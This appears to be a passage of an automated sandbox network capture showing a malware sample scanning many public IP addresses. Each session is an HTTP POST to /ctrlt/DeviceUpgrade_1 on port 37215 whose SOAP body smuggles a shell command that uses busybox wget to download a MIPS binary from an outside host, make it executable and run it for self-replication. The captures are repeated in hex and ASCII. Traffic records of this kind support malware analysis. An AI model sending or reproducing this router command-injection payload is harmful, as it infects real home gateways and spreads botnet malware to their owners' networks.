                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2379192.168.2.2352794157.12.60.1237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681603909 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2380192.168.2.2336150197.101.224.25537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681624889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2381192.168.2.2359034197.107.174.1837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681631088 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2382192.168.2.233407259.22.243.3037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.681992054 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2383192.168.2.235824662.232.142.23537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.683216095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2384192.168.2.2351378157.104.218.3737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.683216095 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2385192.168.2.235307818.242.186.7537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.683327913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2386192.168.2.2346988157.244.12.15137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.684453964 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2387192.168.2.2344944157.12.140.9737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.684561968 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          2388192.168.2.233473041.207.168.17737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:06.684952974 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
